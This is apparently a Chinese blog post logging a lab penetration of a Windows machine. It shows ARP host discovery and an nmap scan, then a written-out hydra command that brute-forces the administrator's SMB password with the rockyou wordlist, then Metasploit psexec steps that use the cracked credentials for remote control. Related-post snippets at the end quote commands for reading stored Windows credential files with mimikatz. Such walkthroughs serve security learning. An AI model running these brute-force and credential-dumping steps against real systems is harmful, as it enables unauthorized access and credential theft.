记录一下渗透Windows并远程控制的过程

原创 于 2025-07-09 06:50:39 发布 · 147 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透Windows #远程控制

文章目录

    • 一、扫描主机
    • 二、端口扫描
    • 三、破解密码
    • 四、渗透测试

一、扫描主机

Netdiscover是一款基于ARP协议的网络扫描工具,主要用于发现局域网内的活动主机。
在这里插入图片描述

二、端口扫描

nmap(Network Mapper)是一款开源免费的端口扫描工具。
在这里插入图片描述

三、破解密码

# hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.1.106 smb -V

在这里插入图片描述

四、渗透测试

msfconsole 是 Metasploit 框架 (MSF) 最主要的‌命令行控制台接口‌。其中, psexec 模块(通常指 exploit/windows/smb/psexec )是基于 Sysinternals 工具 PsExec 原理开发的渗透测试工具。
在这里插入图片描述
1、search psexec
在这里插入图片描述
2、use 编号

3、option

4、set rhost 192.168.1.106

set smbpass 1

set smbuser administrator

5、run

Kali渗透测试远程控制被控端免杀及DLL生成、注入反弹
Liu_Bruce的博客
05-09 4185
Kali渗透测试远程控制被控端免杀及DLL生成、注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的方法(简称为免杀技术)。远程控制被控端也可被看作病毒的一种。 ​ 到目前为止,杀毒软件主要使用了3种技术。如下: 基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,将其加入病毒库,检测程序时看它是否包含这个特征码。 基于
信息安全之远程控制
cnm1131627的博客
05-06 1134
远程控制是指在渗透测试中通过远程手段控制目标系统,进行各种操作和获取信息。远程控制渗透测试中扮演着重要的角色。通过远程控制渗透测试人员可以模拟攻击者对目标系统进行操作,从而发现系统中的弱点和安全漏洞。以下是一些常见的远程控制技术:1. 反向Shell:通过在目标系统上安装恶意软件,使其与攻击者的控制服务器建立连接,通过该连接实现远程控制。反向Shell可以用于执行命令、上传/下载文件、查看系统信息等操作。
Windows 远程连接记录获取
03-10 8392
简介 远程连接时,会将远程服务器的用户名和密码保存在本地的,所有可以通过解析相关文件,解密出相关凭证 本地获取 使用以下命令就可以查看本地保存的凭证,每个文件都是对应的一个远程连接的密码 dir /a %userprofile%\AppData\Local\Microsoft\Credentials\ mimikatz使用以下命令 privilege::debug dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Crede
Windows内网渗透命令
backtwo的博客
10-28 1043
【代码】Windows内网渗透命令。
MSF及Windows渗透测试
qq_67812668的博客
08-09 1232
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
Windows远程桌面(RDP)密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-07 6113
文章目录RDP连接记录MySQL数据库密码破解WiFi密码获取浏览器相关记录其他可造成安全隐患软件NacicatXmangagerTeamview RDP连接记录 MySQL数据库密码破解 WiFi密码获取 浏览器相关记录 其他可造成安全隐患软件 Nacicat Xmangager Teamview ...
实战ms17_010_psexec远程控制漏洞入侵Windows server 2003
hih30250的博客
11-06 1502
本篇文章记录使用metasploit利用Windows远程控制漏洞攻击获取shell权限的过程
实战-使用msf渗透攻击win7主机远程执行命令
保持微笑的博客
01-14 2718
1.什么是永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.通过msf模块获取win7主机远程shell 模块的整体使用流程如下
Kali Linux:如何捕获 Windows 10 以进行远程监控
qq_28791753的博客
11-24 2275
在今天的指南中,我们了解了恶意黑客如何创建 Windows 10 桌面的永久连接和流式传输来监视我们的动向。最后,我们还看到了通过检测此类攻击来采取保护措施的方法。
掌握Windows远程控制编程源码
### Windows远程控制技术 Windows操作系统为远程控制提供了多种官方和非官方的技术。以下是几种主要的Windows远程控制技术: 1. **Windows远程桌面协议(RDP)**:RDP是Windows系统中的一项重要功能,允许用户远程...
从零打造企业级Android木马:数据窃取与远程控制实战
全栈
05-09 1582
本实战教程深入解析企业级Android木马的构建与攻击链,涵盖权限滥用、隐蔽通信、数据窃取(联系人/短信/位置)及远程控制(屏幕监控、文件操作)技术。通过真实案例(如AhMyth、鳄鱼木马)演示从代码编写到C2通信的全流程,结合EMM绕过、供应链攻击等高级策略,揭示企业设备防护漏洞。适合安全研究人员与红队攻防演练。
工业计算机远程控制,基于SOCKET技术的计算机远程控制实现
weixin_39547596的博客
07-25 479
摘要:时至今日,计算机网络已经成为了人类社会生活中必不可少的组成部分,其中计算机的远程控制系统更是为整个社会的进步起到推动作用。除了在工业自动化生产之外,计算机远程控制系统还广泛的应用于办公、技术支持等方面。在本文中,将设计一种简单的基于的SOCKET技术的计算机远程控制系统。关键词:SOCKET;计算机远程控制中图分类号:TP273.5文献标识码:A文章编号:1007-9599 (2012) 0...
新闻推荐系统源码-基于springboot的新闻推荐系统设计与实现-新闻推荐网站代码-新闻推荐项目代码
08-12
新闻推荐-新闻推荐系统-新闻推荐系统源码-新闻推荐系统代码-springboot新闻推荐系统源码-基于springboot的新闻推荐系统设计与实现-新闻推荐管理系统-新闻推荐项目代码-新闻推荐网站代码
No.31 MATLABSimulink仿真:新能源网逆变器及其功能,包括SVPWM矢量调制、PI电流环控制、dq控制与有功无功及直流母线电压控制
08-12
内容概要:本文介绍了如何利用MATLAB/Simulink进行新能源网逆变器的仿真,重点解析了SVPWM矢量调制、坐标变换、PI电流环、dq控制、有功无功控制及直流母线电压控制等关键功能。文中首先概述了新能源网逆变器的重要性和MATLAB/Simulink的作用,接着详细描述了模型构建方法,最后深入探讨了各个关键功能的具体实现和技术细节。通过这些技术的应用,能够有效提高逆变器的性能和电能质量。 适合人群:从事电力电子、新能源发电及控制系统设计的研究人员和工程师。 使用场景及目标:适用于需要理解和掌握新能源网逆变器工作原理及其实现方法的专业人士,旨在帮助他们更好地设计和优化逆变器系统,提升系统的稳定性和效率。 其他说明:文章不仅提供了理论解释,还结合实际案例进行了详细的功能解析,有助于读者全面理解应用于实际项目中。
基于JAVA的学生课外活动管理系统的设计与实现
最新发布
08-12
基于JAVA的学生课外活动管理系统的设计与实现的论文
Kubernetes持久化存储PVC和PV使用教程.doc
08-12
Kubernetes持久化存储PVC和PV使用教程.doc
教师工作量管理-教师工作量管理系统源码-基于Web的教师工作量管理系统设计与实现-教师工作量管理网站代码
08-12
教师工作量管理-教师工作量管理系统-教师工作量管理系统源码-教师工作量管理系统代码-springboot教师工作量管理系统源码-基于springboot的教师工作量管理系统设计与实现-项目代码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

bjzhang75

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值